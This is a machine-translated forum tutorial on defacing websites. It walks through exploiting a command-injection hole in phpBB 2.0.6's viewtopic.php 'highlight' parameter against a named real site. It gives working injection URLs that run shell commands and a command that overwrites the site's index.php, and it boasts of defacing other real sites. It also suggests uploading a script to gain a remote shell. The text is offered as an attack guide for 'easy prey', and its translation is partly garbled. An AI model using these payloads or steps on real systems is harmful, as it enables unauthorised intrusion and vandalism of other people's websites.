Complete guide to deface (updated)

Introduction
I often see the question on the forum: "How to break down the sites?" Or "How do I redevelop the site?". Today you will be able to defect the portal without putting any effort! All lovers of easy prey I invite! =)

Main part
Today I will talk about how to make the differences of various sites, through errors in popular scripts. Recently, a serious security hole was discovered in the popular phpBB engine.
A vulnerability was detected in the module viewtopic.php

The point is that a remote attacker could execute an arbitrary php script on an affected system when passing about such a line viewtopic.php? T = 1 & highlight =% 27

As you probably already guessed, this vulnerability allows you to execute arbitrary commands of any length on a vulnerable server. Today we will use this hole, and together with you we will break the real server. Our goal is to be a deface, that is, replacing the main page of the site with ours.

So, let's start, our victim will be www.maxmuscle.dk (at the time of publication, the portal is resistant to vulnerability).
The first thing that catches our eye when visiting this page is that it is built on the basis of the portal system php-nuke.

By default, phpBB is the forum in this system. We click on the link that leads us to the forum, (http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=index.php) and make sure that this is phpBB version 2.0.6 .

We pass the following query to the forum:

Http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=viewtopic.php&t=2&highlight=%27.$poster=`$ls`.%27&l s =

And find that the engine has absorbed the line, as evidenced by the characteristic inscription instead of the nickname of one of the users: ") #i". But it does not mean anything, we can easily break off the execution of commands on this server, but we will not guess and just try to execute it:

Http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=viewtopic.php&t=2&highlight=%27.$poster=`$ls`.%27&l s = pwd

This command (pwd) should show us the directory in which we are now, if this happens, then it follows that the execution of commands on the server is possible. This is what happens. The path of the / var / www / html / osclux / directory is displayed . The next command is "id" to test our access.

As we see the rights we have uid = 99 (nobody) , that is, the rights of the web server. Now we display the listing of the folders and files in the html_public directory, using the command "dir / var / www / html / osclux" and find that the index.php we need for the deface lies in this directory.

So, we are on the finishing line - by executing the command echo Hacked by vasya> index.php , we will display on the main page the inscription "Hacked by vasya". We check. Happened.

You made a deface.

Instead of concluding
It was in such a simple way that the hackzona.ru was defaced, that's how the forum on nsd.ru was broken. I also note that this is the simplest implementation of this hole, under good conditions, you can easily flood it onto a server listening to a specific port, a script on a pearl, and get a full shell with nobody rights.